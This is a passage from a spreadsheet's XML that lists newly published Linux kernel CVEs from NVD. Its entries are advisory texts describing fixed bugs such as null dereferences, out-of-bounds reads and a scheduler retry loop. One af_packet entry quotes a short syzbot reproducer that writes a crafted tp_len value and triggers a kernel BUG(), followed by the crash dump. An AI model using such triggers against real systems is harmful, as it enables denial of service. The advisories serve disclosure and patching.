        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q709" s="5" t="inlineStr"/>
      <c r="R709" s="5" t="inlineStr"/>
      <c r="S709" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: ump: do not touch legacy_rmidi before it exists
snd_ump_parse_endpoint() sets ump-&gt;parsed on every exit, including
error, before the caller attaches the legacy rawmidi device.
ump_handle_ep_name_msg() then treats parsed as "legacy_rmidi is live"
and calls ump_legacy_set_rawmidi_name(), which snprintf()s into
ump-&gt;legacy_rmidi-&gt;name. If a UMP packet arrives in that window
(IRQ path from snd_ump_receive), legacy_rmidi is still NULL
(KASAN null-ptr-deref in snprintf).
Guard the legacy helpers. parsed only means endpoint info was
parsed, not that legacy_rmidi exists.</t>
        </is>
      </c>
      <c r="T709" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98086</t>
        </is>
      </c>
    </row>
    <row r="710">
      <c r="A710" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B710" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C710" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98087</t>
        </is>
      </c>
      <c r="D710" s="5" t="inlineStr"/>
      <c r="E710" s="5" t="inlineStr"/>
      <c r="F710" s="5" t="inlineStr"/>
      <c r="G710" s="5" t="inlineStr"/>
      <c r="H710" s="5" t="inlineStr"/>
      <c r="I710" s="5" t="inlineStr"/>
      <c r="J710" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K710" s="5" t="inlineStr"/>
      <c r="L710" s="5" t="inlineStr"/>
      <c r="M710" s="5" t="inlineStr"/>
      <c r="N710" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O710" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P710" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q710" s="5" t="inlineStr"/>
      <c r="R710" s="5" t="inlineStr"/>
      <c r="S710" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/rt,dl: Skip migrate-disabled tasks when picking a push candidate
A migrate_disable()'d RT task cannot be moved to another CPU, but the
scheduler still keeps such a task on that CPU's pushable list
(rq-&gt;rt.pushable_tasks) and still marks the runqueue RT-overloaded
(rq-&gt;rt.overloaded = 1). So the RT balancer keeps treating this CPU as
having a task to move away, and keeps trying to move the task, but the
push can never succeed. When the head is pinned, push_rt_task() does not
give up either. It falls back to pushing rq-&gt;curr instead, using the
per-CPU stopper, as added by commit a7c81556ec4d ("sched: Fix
migrate_disable() vs rt/dl balancing").
The CPU spends tens of milliseconds in this retry loop. The core is
isolated for real-time work, but during the loop nearly half of its time
is consumed by pushes that cannot succeed.
An ftrace capture of the affected CPU, with sched_switch enabled and
commit 94894c9c477e ("sched/rt: Skip currently executing CPU in
rto_next_cpu()") applied, shows where the CPU time went. Two SCHED_FIFO
tasks at equal priority shared the CPU, taskA migrate_disable()'d and
queued, taskB as rq-&gt;curr. In one 89 ms window, taskB got only 52 ms of
CPU. The other 37 ms went to the stopper thread.
The scheduler kept trying to push taskA, the pinned head of the pushable
list, fell back to pushing taskB instead, and woke the stopper 5204
times. Every one of those pushes failed and no task was moved. taskA
stayed runnable and queued the whole time, and never ran.
Pushing taskB fails on a re-check. find_lock_lowest_rq() drops the rq
lock to take the target rq lock, then checks again with
"task != pick_next_pushable_task(rq)".
The task being pushed is taskB, but the pick returns taskA, the head of
the pushable list. taskB is rq-&gt;curr, and set_next_task_rt() removes the
running task from that list, so taskB can never be the head. The check
expects a candidate taken from the pushable list, but the fallback
pushes rq-&gt;curr, which is never on that list. So the check fails every
time.
   .--&gt; push-IPI arrives
   |          |
   |          v
   |     pushable head = taskA   -&gt;  pinned, cannot be pushed
   |          |
   |          v
   |     so push taskB instead   -&gt;  wake migration/N, a stop-class
   |          |                      thread, so it preempts taskB
   |          v
   |     re-check compares taskB against the pushable head,
   |     which is still taskA                        -&gt;  give up
   |          |
   |          v
   |     nothing moved, taskA still queued, rq still overloaded
   |          |
   '----------'
         repeats every ~17 us, 5204 times, for 89 ms
   The loop cannot stop itself. Every round leaves the runqueue
   exactly as it was, so the next push-IPI does the same thing. In
   the capture it ended only when taskB went to sleep on its own.
   taskA was then picked locally and left the pushable list.
   CPU time per task in the window, from sched_switch:
     taskB         51.95 ms   real work
     migration/N   37.18 ms   nothing moved
     taskA          0.00 ms   queued the whole time, never picked
     idle           0.01 ms
   Counts over the same window:
      7667  push-IPIs handled on this CPU
     17481  pick_next_pushable_task() returned taskA, still pinned
      5204  find_lock_lowest_rq() gave up on the re-check
         1  push that actually completed
         0  migrations of taskA
   The CPU times and the window length come from the standard
   sched_switch tracepoint. The counts needed tracepoints added inside
   the RT balancer for this investigation.
The self-IPI path is closed by the rto_next_cpu() fix above, and that
part works. But the runqueue is still marked overloaded, because the
pinned task is still advertised as pushable. Other CPUs now send the
push-IPIs during their own RT balancing, and the same loop runs again.
Closing the self-IPI path did not stop a pinn
---truncated---</t>
        </is>
      </c>
      <c r="T710" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98087</t>
        </is>
      </c>
    </row>
    <row r="711">
      <c r="A711" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B711" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C711" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98088</t>
        </is>
      </c>
      <c r="D711" s="5" t="inlineStr"/>
      <c r="E711" s="5" t="inlineStr"/>
      <c r="F711" s="5" t="inlineStr"/>
      <c r="G711" s="5" t="inlineStr"/>
      <c r="H711" s="5" t="inlineStr"/>
      <c r="I711" s="5" t="inlineStr"/>
      <c r="J711" s="5" t="inlineStr"/>
      <c r="K711" s="5" t="inlineStr"/>
      <c r="L711" s="5" t="inlineStr"/>
      <c r="M711" s="5" t="inlineStr"/>
      <c r="N711" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O711" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P711" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q711" s="5" t="inlineStr"/>
      <c r="R711" s="5" t="inlineStr"/>
      <c r="S711" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: mpt3sas: Avoid out-of-bounds cpumask_of_node() call in _base_assign_reply_queues()
dev_to_node() can return NUMA_NO_NODE (-1) on systems without NUMA
topology information for the PCI device, such as single-socket boards
that don't expose device-to-node affinity. Passing -1 directly into
cpumask_of_node() indexes node_to_cpumask_map[-1], an out-of-bounds
array read caught by UBSAN:
  UBSAN: array-index-out-of-bounds in arch/x86/include/asm/topology.h:72:28
  index -1 is out of range for type 'cpumask *[1024]'
Fall back to cpu_online_mask when no NUMA node is available, rather than
assuming dev_to_node() always returns a valid node index.</t>
        </is>
      </c>
      <c r="T711" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98088</t>
        </is>
      </c>
    </row>
    <row r="712">
      <c r="A712" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B712" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C712" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98089</t>
        </is>
      </c>
      <c r="D712" s="5" t="inlineStr"/>
      <c r="E712" s="5" t="inlineStr"/>
      <c r="F712" s="5" t="inlineStr"/>
      <c r="G712" s="5" t="inlineStr"/>
      <c r="H712" s="5" t="inlineStr"/>
      <c r="I712" s="5" t="inlineStr"/>
      <c r="J712" s="5" t="inlineStr"/>
      <c r="K712" s="5" t="inlineStr"/>
      <c r="L712" s="5" t="inlineStr"/>
      <c r="M712" s="5" t="inlineStr"/>
      <c r="N712" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O712" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P712" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q712" s="5" t="inlineStr"/>
      <c r="R712" s="5" t="inlineStr"/>
      <c r="S712" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bonding: alb: fix uninitialized transport header access in alb_determine_nd()
alb_determine_nd() uses icmp6_hdr(skb) to inspect ICMPv6 headers.
However, in xmit paths (e.g. packets sent via AF_PACKET / raw sockets
or forwarded packets), skb-&gt;transport_header is not guaranteed to be
initialized. While pskb_network_may_pull() ensures the packet data is
linear starting from the network header, it does not set or adjust the
transport header offset.
Dereferencing icmp6_hdr(skb) can therefore access out-of-bounds memory.
Fetch the icmp6hdr directly after ipv6hdr following pskb_network_may_pull(),
and reload ipv6hdr in case pskb_may_pull() reallocated skb-&gt;head.
Also remove the unused bond argument from alb_determine_nd().</t>
        </is>
      </c>
      <c r="T712" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98089</t>
        </is>
      </c>
    </row>
    <row r="713">
      <c r="A713" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B713" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C713" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98090</t>
        </is>
      </c>
      <c r="D713" s="5" t="inlineStr"/>
      <c r="E713" s="5" t="inlineStr"/>
      <c r="F713" s="5" t="inlineStr"/>
      <c r="G713" s="5" t="inlineStr"/>
      <c r="H713" s="5" t="inlineStr"/>
      <c r="I713" s="5" t="inlineStr"/>
      <c r="J713" s="5" t="inlineStr"/>
      <c r="K713" s="5" t="inlineStr"/>
      <c r="L713" s="5" t="inlineStr"/>
      <c r="M713" s="5" t="inlineStr"/>
      <c r="N713" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O713" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P713" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q713" s="5" t="inlineStr"/>
      <c r="R713" s="5" t="inlineStr"/>
      <c r="S713" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: restore active device pointers after failed sprout
btrfs_init_new_device() switches latest_dev and possibly s_bdev from the
seed device to the new sprout device before creating the first writable
chunks.
If chunk creation or the subsequent sprout setup fails, the error path
releases the new device without switching those pointers back.
btrfs_show_devname() can then dereference the freed latest_dev and crash.
Restore the active device pointers to the latest seed device before
removing and releasing the failed sprout device.</t>
        </is>
      </c>
      <c r="T713" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98090</t>
        </is>
      </c>
    </row>
    <row r="714">
      <c r="A714" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B714" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C714" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98091</t>
        </is>
      </c>
      <c r="D714" s="5" t="inlineStr"/>
      <c r="E714" s="5" t="inlineStr"/>
      <c r="F714" s="5" t="inlineStr"/>
      <c r="G714" s="5" t="inlineStr"/>
      <c r="H714" s="5" t="inlineStr"/>
      <c r="I714" s="5" t="inlineStr"/>
      <c r="J714" s="5" t="inlineStr"/>
      <c r="K714" s="5" t="inlineStr"/>
      <c r="L714" s="5" t="inlineStr"/>
      <c r="M714" s="5" t="inlineStr"/>
      <c r="N714" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O714" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P714" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q714" s="5" t="inlineStr"/>
      <c r="R714" s="5" t="inlineStr"/>
      <c r="S714" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: detach failed sprout device from transaction update list
When creating the first metadata chunk for a sprout filesystem,
create_chunk() adds the new device to the transaction dev_update_list
through device-&gt;post_commit_list.
If the subsequent system chunk creation fails, btrfs_init_new_device()
aborts the transaction and releases the device while post_commit_list is
still linked. This triggers a warning in btrfs_free_device() and leaves
the transaction list referencing freed memory.
Detach the device while holding chunk_mutex before releasing it.</t>
        </is>
      </c>
      <c r="T714" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98091</t>
        </is>
      </c>
    </row>
    <row r="715">
      <c r="A715" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B715" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C715" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98092</t>
        </is>
      </c>
      <c r="D715" s="5" t="inlineStr"/>
      <c r="E715" s="5" t="inlineStr"/>
      <c r="F715" s="5" t="inlineStr"/>
      <c r="G715" s="5" t="inlineStr"/>
      <c r="H715" s="5" t="inlineStr"/>
      <c r="I715" s="5" t="inlineStr"/>
      <c r="J715" s="5" t="inlineStr"/>
      <c r="K715" s="5" t="inlineStr"/>
      <c r="L715" s="5" t="inlineStr"/>
      <c r="M715" s="5" t="inlineStr"/>
      <c r="N715" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O715" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P715" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q715" s="5" t="inlineStr"/>
      <c r="R715" s="5" t="inlineStr"/>
      <c r="S715" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: amd: yc: fix memory leak in acp6x_pdm_dma_close()
acp6x_pdm_dma_close() does not free the runtime-&gt;private_data buffer
allocated in acp6x_pdm_dma_open(). Add the missing kfree.</t>
        </is>
      </c>
      <c r="T715" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98092</t>
        </is>
      </c>
    </row>
    <row r="716">
      <c r="A716" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B716" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C716" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98093</t>
        </is>
      </c>
      <c r="D716" s="5" t="inlineStr"/>
      <c r="E716" s="5" t="inlineStr"/>
      <c r="F716" s="5" t="inlineStr"/>
      <c r="G716" s="5" t="inlineStr"/>
      <c r="H716" s="5" t="inlineStr"/>
      <c r="I716" s="5" t="inlineStr"/>
      <c r="J716" s="5" t="inlineStr"/>
      <c r="K716" s="5" t="inlineStr"/>
      <c r="L716" s="5" t="inlineStr"/>
      <c r="M716" s="5" t="inlineStr"/>
      <c r="N716" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O716" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P716" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q716" s="5" t="inlineStr"/>
      <c r="R716" s="5" t="inlineStr"/>
      <c r="S716" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: fsl_micfil: balance mclk enable/disable
hw_params() enables mclk unconditionally and hw_free() disables it
unconditionally, but the PCM core does not guarantee 1:1 pairing:
hw_free() can run without hw_params(), and hw_params() can be called
multiple times from the SETUP state. This triggers an "already
disabled" WARN() in the first case and leaks an enable reference in
the second, leaving the clock ungateable.
Guard both sides with the existing mclk_flag, as fsl_sai.c does with
mclk_streams.</t>
        </is>
      </c>
      <c r="T716" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98093</t>
        </is>
      </c>
    </row>
    <row r="717">
      <c r="A717" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B717" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C717" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98094</t>
        </is>
      </c>
      <c r="D717" s="5" t="inlineStr"/>
      <c r="E717" s="5" t="inlineStr"/>
      <c r="F717" s="5" t="inlineStr"/>
      <c r="G717" s="5" t="inlineStr"/>
      <c r="H717" s="5" t="inlineStr"/>
      <c r="I717" s="5" t="inlineStr"/>
      <c r="J717" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K717" s="5" t="inlineStr"/>
      <c r="L717" s="5" t="inlineStr"/>
      <c r="M717" s="5" t="inlineStr"/>
      <c r="N717" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O717" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P717" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q717" s="5" t="inlineStr"/>
      <c r="R717" s="5" t="inlineStr"/>
      <c r="S717" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
staging: fbtft: make dirty_lock IRQ-safe
fbtft_mkdirty() can be reached from the fbcon rendering path while
processing printk() in hardirq context. Meanwhile, dirty_lock is also
taken by fbtft_deferred_io() in workqueue context with local interrupts
enabled.
Lockdep reports a possible IRQ lock inversion involving dirty_lock and
console_owner. A hardirq can interrupt a CPU holding dirty_lock and
enter the console rendering path, which can attempt to acquire
dirty_lock again.
The following lockdep report was observed on an RK3566 system with
CONFIG_PROVE_LOCKING enabled:
  WARNING: possible irq lock inversion dependency detected
  swapper/2/0 just changed the state of lock:
  (console_owner){-...}-{0:0}
  but this lock took another, HARDIRQ-unsafe lock in the past:
  (&amp;par-&gt;dirty_lock){+.+.}-{2:2}
  CPU0                    CPU1
  ----                    ----
  lock(&amp;par-&gt;dirty_lock);
                         local_irq_disable();
                         lock(console_owner);
                         lock(&amp;par-&gt;dirty_lock);
  &lt;Interrupt&gt;
    lock(console_owner);
  *** DEADLOCK ***
Use spin_lock_irqsave() for fbtft_mkdirty() and spin_lock_irq() for
fbtft_deferred_io(). They only access the dirty line range, so the
IRQ-off regions remain short.</t>
        </is>
      </c>
      <c r="T717" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98094</t>
        </is>
      </c>
    </row>
    <row r="718">
      <c r="A718" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B718" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C718" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98095</t>
        </is>
      </c>
      <c r="D718" s="5" t="inlineStr"/>
      <c r="E718" s="5" t="inlineStr"/>
      <c r="F718" s="5" t="inlineStr"/>
      <c r="G718" s="5" t="inlineStr"/>
      <c r="H718" s="5" t="inlineStr"/>
      <c r="I718" s="5" t="inlineStr"/>
      <c r="J718" s="5" t="inlineStr">
        <is>
          <t>f5, go, gin</t>
        </is>
      </c>
      <c r="K718" s="5" t="inlineStr"/>
      <c r="L718" s="5" t="inlineStr"/>
      <c r="M718" s="5" t="inlineStr"/>
      <c r="N718" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O718" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P718" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q718" s="5" t="inlineStr"/>
      <c r="R718" s="5" t="inlineStr"/>
      <c r="S718" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
af_packet: Don't cast tpacket_hdr.tp_len to int in tpacket_parse_header().
syzbot reported BUG() in sock_sendmsg_nosec(). [0]
The problem is that tpacket_parse_header() casts user-provided
tpacket_hdr.tp_len, which is u32, to int.
If the length is larger than INT_MAX, the following condition
in tpacket_parse_header() passes,
  if (unlikely(tp_len &gt; size_max))
and any negative value can be returned to the caller, up to
sock_sendmsg_nosec().
The repro set tpacket_hdr.tp_len to 0xfffffdef, which is cast
to -EIOCBQUEUED (-529), triggering BUG() in sock_sendmsg_nosec().
  *(uint64_t*)0x200000000008 = 0xfffffdef;
  ...
  syscall(__NR_write, /*fd=*/r[0], /*buf=*/0x200000000000ul, /*count=*/1ul);
Let's define the local tp_len as u32 in tpacket_parse_header().
[0]:
kernel BUG at net/socket.c:803!
Oops: invalid opcode: 0000 [#1] SMP KASAN PTI
CPU: 0 UID: 0 PID: 5628 Comm: syz-executor176 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/24/2026
RIP: 0010:sock_sendmsg_nosec+0x145/0x180 net/socket.c:803
Code: 06 67 48 0f b9 3a eb 95 e8 e8 3a 22 f8 48 89 df 4c 89 f6 4c 89 e2 4d 89 fb 2e e8 32 a5 5c 16 e9 51 ff ff ff e8 cc 3a 22 f8 90 &lt;0f&gt; 0b e8 c4 3a 22 f8 48 83 c3 18 48 89 d8 48 c1 e8 03 42 80 3c 28
RSP: 0018:ffffc90003aefb48 EFLAGS: 00010293
RAX: ffffffff89a578d4 RBX: ffff8880764c67c0 RCX: ffff88807fb23e80
RDX: 0000000000000000 RSI: 00000000fffffdef RDI: 00000000fffffdef
RBP: 00000000fffffdef R08: ffffc90003aef747 R09: 1ffff9200075dee8
R10: dffffc0000000000 R11: fffff5200075dee9 R12: 0000000000000001
R13: dffffc0000000000 R14: ffffc90003aefbc0 R15: ffffffff8aac4310
FS:  000055559101b400(0000) GS:ffff888124ce0000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000200000000210 CR3: 0000000073dca000 CR4: 00000000003526f0
Call Trace:
 &lt;TASK&gt;
 __sock_sendmsg net/socket.c:815 [inline]
 sock_write_iter+0x2de/0x3e0 net/socket.c:1266
 new_sync_write fs/read_write.c:595 [inline]
 vfs_write+0x612/0xba0 fs/read_write.c:687
 ksys_write+0x150/0x270 fs/read_write.c:739
 do_syscall_x64 arch/x86/entry/syscall_64.c:61 [inline]
 do_syscall_64+0x166/0x520 arch/x86/entry/syscall_64.c:84
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f173130ecb9
Code: c0 79 93 eb d5 48 8d 7c 1d 00 eb 99 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 c7 c1 d8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007ffd67e44248 EFLAGS: 00000246 ORIG_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 0000200000000000 RCX: 00007f173130ecb9
RDX: 0000000000000001 RSI: 0000200000000000 RDI: 0000000000000003
RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 00007ffd67e44388
R13: 0000000000000002 R14: 00002000000000c0 R15: 0000000000000002
 &lt;/TASK&gt;</t>
        </is>
      </c>
      <c r="T718" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98095</t>
        </is>
      </c>
    </row>
    <row r="719">
      <c r="A719" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B719" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C719" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98097</t>
        </is>
      </c>
      <c r="D719" s="5" t="inlineStr"/>
      <c r="E719" s="5" t="inlineStr"/>
      <c r="F719" s="5" t="inlineStr"/>
      <c r="G719" s="5" t="inlineStr"/>
      <c r="H719" s="5" t="inlineStr"/>
      <c r="I719" s="5" t="inlineStr"/>
      <c r="J719" s="5" t="inlineStr"/>
      <c r="K719" s="5" t="inlineStr"/>
      <c r="L719" s="5" t="inlineStr"/>
      <c r="M719" s="5" t="inlineStr"/>
      <c r="N719" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O719" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P719" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q719" s="5" t="inlineStr"/>
      <c r="R719" s="5" t="inlineStr"/>
      <c r="S719" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tipc: Dont send random pad bytes in RESET/ACTIVATE messages
The interface name is passed in a fixed length (TIPC_MAX_IF_NAME) buffer.
Replace the strcpy(data, l-&gt;if_name) with memcpy() so that the
pad bytes are actually written (l-&gt;if_name[] is zero padded)
rather than sending random bytes from the skb to the remote system.
Replace two other strcpy() with strscpy().</t>
        </is>
      </c>
      <c r="T719" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98097</t>
        </is>
      </c>
    </row>
    <row r="720">
      <c r="A720" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B720" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C720" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98098</t>
        </is>
      </c>
      <c r="D720" s="5" t="inlineStr"/>
      <c r="E720" s="5" t="inlineStr"/>
      <c r="F720" s="5" t="inlineStr"/>
      <c r="G720" s="5" t="inlineStr"/>
      <c r="H720" s="5" t="inlineStr"/>
      <c r="I720" s="5" t="inlineStr"/>
      <c r="J720" s="5" t="inlineStr"/>
      <c r="K720" s="5" t="inlineStr"/>
      <c r="L720" s="5" t="inlineStr"/>
      <c r="M720" s="5" t="inlineStr"/>
      <c r="N720" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O720" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P720" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q720" s="5" t="inlineStr"/>
      <c r="R720" s="5" t="inlineStr"/>
      <c r="S720" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tipc: fix NULL deref in tipc_named_node_up() on empty publication list
User-space applications can bind a large number of service addresses to
one or more sockets. Each binding of a local-scope service address inserts
one entry (publication) into the TIPC name table. If the number of these
publications exceeds TIPC_MAX_PUBL (65535), protocol service types
(such as node state and link state) are no longer inserted into the name
table. This causes two issues:
1. User-space applications subscribing to node or link up/down events
   stop receiving notifications.
2. A NULL pointer dereference can occur:
   BUG: kernel NULL pointer dereference, address: 00000000000000d0
   ...
   CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 7.2.0-rc4-default+ #5 PREEMPT(full)
   ...
   RIP: 0010:tipc_named_node_up (./include/linux/skbuff.h:2251 net/tipc/name_distr.c:195 net/tipc/name_distr.c:221)
   ...
   Call Trace:
   &lt;IRQ&gt;
   tipc_node_write_unlock (net/tipc/node.c:428)
   tipc_rcv (net/tipc/node.c:934 net/tipc/node.c:2189)
   tipc_udp_recv (net/tipc/udp_media.c:389)
   Thread 1 (tipc_net_finalize) | Thread 2 (named_distribute)
   -----------------------------|-----------------------------
                                | ...
                                | list_for_each_entry(publ, pls, binding_node) {
                                | ...
                                | __skb_queue_tail(list, skb);
                                | ...
                                | }
                                | ...
                                | hdr = buf_msg(skb_peek_tail(list));
   ...                          |
   tipc_nametbl_publish();      |
   If 'tipc_nametbl_publish()' (Thread 1) fails because the number of
   local publications reaches TIPC_MAX_PUBL, list (Thread 2) will be empty. As a
   result, NULL is passed to 'buf_msg()', leading to a NULL pointer dereference.
Fix these issues by allowing protocol service types (node state, link state,
and topology server) to be inserted into the name table unconditionally.
This ensures that users subscribing to these types always receive
notifications. In addition, the maximum number of local user publications is
reduced to (TIPC_MAX_PUBL - 1). This ensures that the maximum bulk size
calculated in tipc_link_set_queue_limits() remains valid.</t>
        </is>
      </c>
      <c r="T720" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98098</t>
        </is>
      </c>
    </row>
    <row r="721">
      <c r="A721" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B721" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C721" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98099</t>
        </is>
      </c>
      <c r="D721" s="5" t="inlineStr"/>
      <c r="E721" s="5" t="inlineStr"/>
      <c r="F721" s="5" t="inlineStr"/>
      <c r="G721" s="5" t="inlineStr"/>
      <c r="H721" s="5" t="inlineStr"/>
      <c r="I721" s="5" t="inlineStr"/>
      <c r="J721" s="5" t="inlineStr"/>
